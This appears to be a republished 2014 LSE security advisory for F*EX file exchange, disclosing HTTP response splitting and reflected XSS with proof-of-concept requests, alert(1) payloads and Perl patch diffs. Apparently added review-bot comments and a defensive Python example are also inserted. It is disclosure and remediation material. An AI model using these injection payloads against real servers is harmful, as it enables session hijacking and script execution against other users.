F*EX 20140313-1 HTTP Response Splitting / Cross Site Scripting

Posted Jun 3, 2014
Authored by Eric Sesterhenn | Site lsexperts.de

F*EX version 20140313-1 suffers from HTTP response splitting and cross site scripting vulnerabilities.

tags | exploit, web, vulnerability, xss
advisories | CVE-2014-3875, CVE-2014-3876, CVE-2014-3877
SHA-256 | 4dc3b01fde7c0d86d616433b95f0ae326f207faf8f3d2b9d094c09535ccd6b6e


=== LSE Leading Security Experts GmbH - Security Advisory 2014-05-22 ===

F*EX (Frams' Fast File EXchange) - Multiple Issues
----------------------------------------------------------------------

Affected Versions
=================
F*EX (Frams' Fast File EXchange) 20140313-1 as shipped with Debian is affected;
version fex-20140530 and later are not affected.

Issue Overview
==============
Technical Risk: medium
Likelihood of Exploitation: high
Vendor: Universität Stuttgart
Vendor URL: http://fex.rus.uni-stuttgart.de/
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-22.txt
Advisory Status: Public
CVE-Number: CVE-2014-3875, CVE-2014-3876, CVE-2014-3877



Impact
======
It is possible to attack user sessions and to execute JavaScript in
another user's browser. This might enable an attacker to gain access to files
which are intended for other users of the platform.



Issue Description
=================
While conducting an internal evaluation of the software, LSE Leading
Security Experts GmbH discovered multiple, remotely exploitable issues with
F*EX.

1) HTTP Response splitting in rup

CVE-Number: CVE-2014-3875

When URL-encoded newline characters are inserted into the akey parameter of a
request to rup, the value is copied verbatim into the Set-Cookie header, so
additional HTTP headers can be injected into the reply, as well as new HTML
code at the top of the page.

----------------8<-------------
$ nc 127.0.0.1 8888
GET /rup?akey=test%0d%0a%0d%0aHELLO HTTP/1.0

HTTP/1.1 200 OK
X-Message: OK
Server: fexsrv
Expires: 0
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: akey=test

HELLO; Max-Age=9999; Discard
Content-Type: text/html; charset=UTF-8

<html>
<head>
...
----------------8<-------------

The same attack is possible using a POST request.


2) Cross-Site-Scripting issue in rup

CVE-Number: CVE-2014-3876

The parameter akey is reflected unfiltered as part of the HTML page. Some
characters are forbidden in the GET parameter due to filtering of the
URL, but this can be circumvented by using a POST parameter.
Nevertheless, this issue is exploitable via the GET parameter alone,
with some user interaction.

Opening the following URL opens a popup window when the cursor
moves over the back link at the bottom of the page:

http://127.0.0.1:8888/rup?akey=foo" onmouseover=alert(1) bar="

----------------8<-------------
<p>
<a href="/foc?akey=wow" onmouseover=alert(1) foo="">back to F*EX
operation control</a>
</body></html>
----------------8<-------------


3) Cross-Site-Scripting issue in fup

CVE-Number: CVE-2014-3877

The parameter addto is reflected back to the user as part of the HTML page
with only minimal filtering. Some characters are forbidden in the GET
parameter due to filtering of the URL, but this can be circumvented by
using a POST parameter. Nevertheless, this issue is exploitable via the GET
parameter alone, with some user interaction.

Opening the following URL opens a popup window when the cursor
moves over the recipient entry field:

http://127.0.0.1:8888/fup?addto=%22onmouseover=alert%281%29;bar=%22

----------------8<-------------
<tr title="e-mail address or alias"><td>recipient(s):
<td><input type="text" name="to" size="96"
value=""onmouseover=alert(1);bar=""><br>
</tr>
----------------8<-------------



4) Cross-Site-Scripting issue in fuc

CVE-Number: CVE-2014-3876

The POST parameter disclaimer is reflected back to the user as part of the
HTML page.

Setting the disclaimer POST parameter in the change disclaimer
operation (http://127.0.0.1:8888/fuc?disclaimer=CHANGE&akey=2409d2a55e5acfa407929fb10cb8335f)
to the following value

----------------8<-------------
'"><script>alert(1)</script>
----------------8<-------------

will result in the following HTML code, which opens a popup window:

----------------8<-------------
<pre>
'"><script>alert(1)</script>
</pre>
<p>
----------------8<-------------

An additional attack is possible using the gm POST parameter, by setting
it to malicious HTML code and supplying the GET parameter group.

It looks like other values might be affected as well, since
only limited filtering is performed in the CGI parameter
evaluation.



Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises deactivating F*EX until the vendor
publishes a complete fix. LSE Leading Security Experts GmbH recommends
implementing proper filtering mechanisms for all parameters and proper
output encoding before reflecting values back to the user.

1) HTTP Response splitting in rup

- --- rup.orig 2014-05-23 08:50:01.558808000 +0200
+++ rup 2014-05-23 08:55:03.182808000 +0200
@@ -35,6 +35,7 @@ foreach my $v (param) {
$vv =~ s/[<>]//g;
if ($v =~ /^akey$/i) {
$vv =~ s:[/.]::g;
+ $vv =~ s/[\W]//g;
$akey = untaint($vv);
} elsif ($v =~ /^(from|user)$/i) {
$from = normalize_address($vv);
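Review bot: the added `$vv =~ s/[\W]//g;` makes the preceding `$vv =~ s:[/.]::g;` redundant (`\W` already covers `/` and `.`) and the square brackets around `\W` are unnecessary; more importantly, the patch silently deletes the offending characters instead of rejecting the request, so an akey of `test%0d%0a%0d%0aHELLO` is quietly turned into `testHELLO` and processed under a key the client never sent. Consider failing the request when `$vv !~ /^\w+$/` rather than rewriting the value, and note that the fix only covers `akey`; the `from`/`user` branch still relies on `normalize_address` alone.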


2) Cross-Site-Scripting issue in rup

The patch from 1) is sufficient to fix this issue as well.


3) Cross-Site-Scripting issue in fup

- --- fup.orig 2014-05-23 09:26:12.514808000 +0200
+++ fup 2014-05-23 09:26:53.794808000 +0200
@@ -2551,7 +2551,7 @@ sub setparam {
$replyto = untaint($replyto);
} elsif ($v eq 'ADDTO') {
$vv =~ s/\s.*//;
- - $vv =~ s/[<>]//g;
+ $vv =~ s/[<>"']//g;
$addto = untaint(lc($vv)); # if checkaddress($vv);
} elsif ($v eq 'SUBMIT') {
$submit = $vv;
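Review bot: `$vv =~ s/[<>"']//g;` is a character blacklist applied on input, while the advisory's own recommendation is output encoding; it only holds here because the value is later placed inside a double-quoted `value="..."` attribute and `$vv =~ s/\s.*//;` already truncates at the first whitespace. Consider HTML-escaping `$addto` where fup writes it into the form, so that `&`, `<`, `>`, `"` and `'` are neutralised regardless of the output context, and reinstating the commented-out `checkaddress($vv)` gate so that anything that is not a valid address is rejected rather than trimmed.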


4) Cross-Site-Scripting issue in fuc

No workaround from LSE. All parameters need to be filtered properly
and HTML encoded when reflected back to the user.
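The following is an added example in Python, not the advisory's or F*EX's own Perl: it replays the advisory's sample inputs from issues 1, 2 and 4 to show the header split and the reflected values, then applies the parameter validation and output encoding recommended in this section. All function names are assumptions of the example.

```python
"""Added example (not code from the LSE advisory or from F*EX): replays the
advisory's own sample inputs to show why rup's Set-Cookie header splits and
why the reflected values become XSS, then applies the remedies the advisory
recommends: strict parameter validation and output encoding."""
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed request targets copied from the advisory (issues 1, 2 and 4).
RUP_SPLIT_URL = "/rup?akey=test%0d%0a%0d%0aHELLO"
RUP_XSS_URL = '/rup?akey=foo" onmouseover=alert(1) bar="'
DISCLAIMER_VALUE = "'\"><script>alert(1)</script>"

def query_param(url, name):
    """First value of a query parameter, percent-decoded as a CGI would see it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]

def vulnerable_set_cookie(akey):
    """Unpatched rup behaviour: the parameter value is copied into the header verbatim."""
    return f"Set-Cookie: akey={akey}; Max-Age=9999; Discard"

def header_lines(raw_header):
    """Split a header as an HTTP client does; more than one element means the
    response was split and the remainder is parsed as further headers or body."""
    return raw_header.split("\r\n")

def akey_is_valid(value):
    """Whitelist: only word characters (the class the vendor patch strips) are
    accepted; callers reject rather than rewrite, so a malformed key is never
    silently coerced into a different, possibly valid, key."""
    return re.fullmatch(r"\w+", value) is not None

def safe_set_cookie(akey):
    """Header built only from a validated key, so CR/LF can never reach it."""
    if not akey_is_valid(akey):
        raise ValueError("akey contains non-word characters")
    return f"Set-Cookie: akey={akey}; Max-Age=9999; Discard"

def safe_back_link(akey):
    """Output encoding for the reflected back link: URL-encode the value for the
    query string, then HTML-escape the whole URL for the attribute context."""
    target = "/foc?akey=" + quote(akey, safe="")
    return f'<a href="{html.escape(target, quote=True)}">back to F*EX operation control</a>'

def safe_pre(text):
    """Output encoding for the fuc disclaimer echo: escape before it enters <pre>."""
    return "<pre>\n" + html.escape(text, quote=True) + "\n</pre>"
```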



History
=======
2014-05-22 Issue discovered
2014-05-23 Issue reported
2014-05-23 Vendor reply
2014-05-26 Internal test version supplied by vendor
2014-05-26 Vendor releases a patch
2014-05-30 CVE-Numbers assigned
2014-06-03 Advisory released